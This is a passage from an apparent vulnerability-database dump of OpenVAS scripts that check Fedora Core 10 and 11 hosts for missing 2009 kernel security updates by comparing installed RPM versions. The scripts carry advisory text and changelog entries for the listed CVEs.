OpenVAS Vulnerability Test\n# $Id: fcore_2009_8649.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8649 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nFix sock_sendpage null pointer dereference. CVE-2009-2692.\n\nChangeLog:\n\n* Fri Aug 14 2009 Kyle McMartin 2.6.29.6-217.2.7\n- CVE-2009-2692: Fix sock sendpage NULL ptr deref.\n* Thu Aug 13 2009 Kristian H\u00f8gsberg - 2.6.29.6-217.2.6\n- Backport 0e7ddf7e to fix bad BUG_ON() in i915 gem fence management\ncode. Adds drm-i915-gem-bad-bug-on.patch, fixes #514091.\n* Wed Aug 12 2009 John W. Linville 2.6.29.6-217.2.5\n- iwlwifi: fix TX queue race\n* Mon Aug 10 2009 Jarod Wilson 2.6.29.6-217.2.4\n- Add tunable pad threshold support to lirc_imon\n- Blacklist all iMON devices in usbhid driver so lirc_imon can bind\n- Add new device ID to lirc_mceusb (#512483)\n- Enable IR transceiver on the HD PVR\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.3\n- Don't optimize away NULL pointer tests where pointer is used before the test.\n(CVE-2009-1897)\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.2\n- Fix mmap_min_addr security bugs (CVE-2009-1895)\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.1\n- Fix eCryptfs overflow issues (CVE-2009-2406, CVE-2009-2407)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8649\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8649.\";\n\n\n\nif(description)\n{\n script_id(64704);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2692\", \"CVE-2009-1897\", \"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-8649 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=516949\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:30", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8649.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8649 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-1897"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064704", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064704", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8649.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8649 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nFix sock_sendpage null pointer dereference. CVE-2009-2692.\n\nChangeLog:\n\n* Fri Aug 14 2009 Kyle McMartin 2.6.29.6-217.2.7\n- CVE-2009-2692: Fix sock sendpage NULL ptr deref.\n* Thu Aug 13 2009 Kristian H\u00f8gsberg - 2.6.29.6-217.2.6\n- Backport 0e7ddf7e to fix bad BUG_ON() in i915 gem fence management\ncode. Adds drm-i915-gem-bad-bug-on.patch, fixes #514091.\n* Wed Aug 12 2009 John W. Linville 2.6.29.6-217.2.5\n- iwlwifi: fix TX queue race\n* Mon Aug 10 2009 Jarod Wilson 2.6.29.6-217.2.4\n- Add tunable pad threshold support to lirc_imon\n- Blacklist all iMON devices in usbhid driver so lirc_imon can bind\n- Add new device ID to lirc_mceusb (#512483)\n- Enable IR transceiver on the HD PVR\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.3\n- Don't optimize away NULL pointer tests where pointer is used before the test.\n(CVE-2009-1897)\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.2\n- Fix mmap_min_addr security bugs (CVE-2009-1895)\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.1\n- Fix eCryptfs overflow issues (CVE-2009-2406, CVE-2009-2407)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8649\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8649.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64704\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2692\", \"CVE-2009-1897\", \"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-8649 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=516949\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:57", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8264.", "cvss3": {}, "published": "2009-08-17T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-8264 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2008-5079", "CVE-2009-0065", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-1897"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064551", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064551", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8264.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8264 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to linux kernel 2.6.27.29:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.26\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.27\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.28\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.29\n\nFixes security bugs: CVE-2009-1895 CVE-2009-2406 CVE-2009-2407\n\nChangeLog:\n\n* Fri Jul 31 2009 Chuck Ebbert 2.6.27.29-170.2.78\n- The kernel package needs to override the new rpm %install behavior.\n* Thu Jul 30 2009 Chuck Ebbert 2.6.27.29-170.2.77\n- Linux 2.6.27.29\n* Wed Jul 29 2009 Chuck Ebbert 2.6.27.29-170.2.75.rc1\n- Linux 2.6.27.29-rc1 (CVE-2009-2406, CVE-2009-2407)\n- Drop linux-2.6-netdev-r8169-avoid-losing-msi-interrupts.patch, now in -stable.\n* Wed Jul 29 2009 Chuck Ebbert 2.6.27.28-170.2.74\n- Don't bounce virtio_blk requests (#510304)\n* Mon Jul 27 2009 Chuck Ebbert 2.6.27.28-170.2.73\n- Linux 2.6.27.28 (CVE-2009-1895, CVE-2009-1897)\nDropped patches, merged in stable:\nlinux-2.6-kbuild-fix-unifdef.c-usage-of-getline.patch\nlinux-2.6-netdev-r8169-fix-lg-pkt-crash.patch\nNew config item:\nCONFIG_DEFAULT_MMAP_MIN_ADDR=32768\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8264\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8264.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64551\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-17 16:54:45 +0200 (Mon, 17 Aug 2009)\");\n script_cve_id(\"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-8264 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=511171\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=512861\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=512885\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:11", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8684.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8684 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-2767", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-1897"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064707", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064707", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8684.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8684 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nFix oops in clock_nanosleep syscall which allows an ordinary user to cause a\nnull ptr dereference in the kernel. CVE-2009-2767. Fixes BUG_ON() in the intel\ngem page fault code breaking GNOME Shell.\n\nChangeLog:\n\n* Sat Aug 15 2009 Kyle McMartin 2.6.29.6-217.2.8\n- CVE-2009-2767: Fix clock_nanosleep NULL ptr deref.\n* Fri Aug 14 2009 Kyle McMartin 2.6.29.6-217.2.7\n- CVE-2009-2692: Fix sock sendpage NULL ptr deref.\n* Thu Aug 13 2009 Kristian H\u00f8gsberg - 2.6.29.6-217.2.6\n- Backport 0e7ddf7e to fix bad BUG_ON() in i915 gem fence management\ncode. Adds drm-i915-gem-bad-bug-on.patch, fixes #514091.\n* Wed Aug 12 2009 John W. Linville 2.6.29.6-217.2.5\n- iwlwifi: fix TX queue race\n* Mon Aug 10 2009 Jarod Wilson 2.6.29.6-217.2.4\n- Add tunable pad threshold support to lirc_imon\n- Blacklist all iMON devices in usbhid driver so lirc_imon can bind\n- Add new device ID to lirc_mceusb (#512483)\n- Enable IR transceiver on the HD PVR\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8684\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8684.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64707\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2767\", \"CVE-2009-2692\", \"CVE-2009-1897\", \"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", 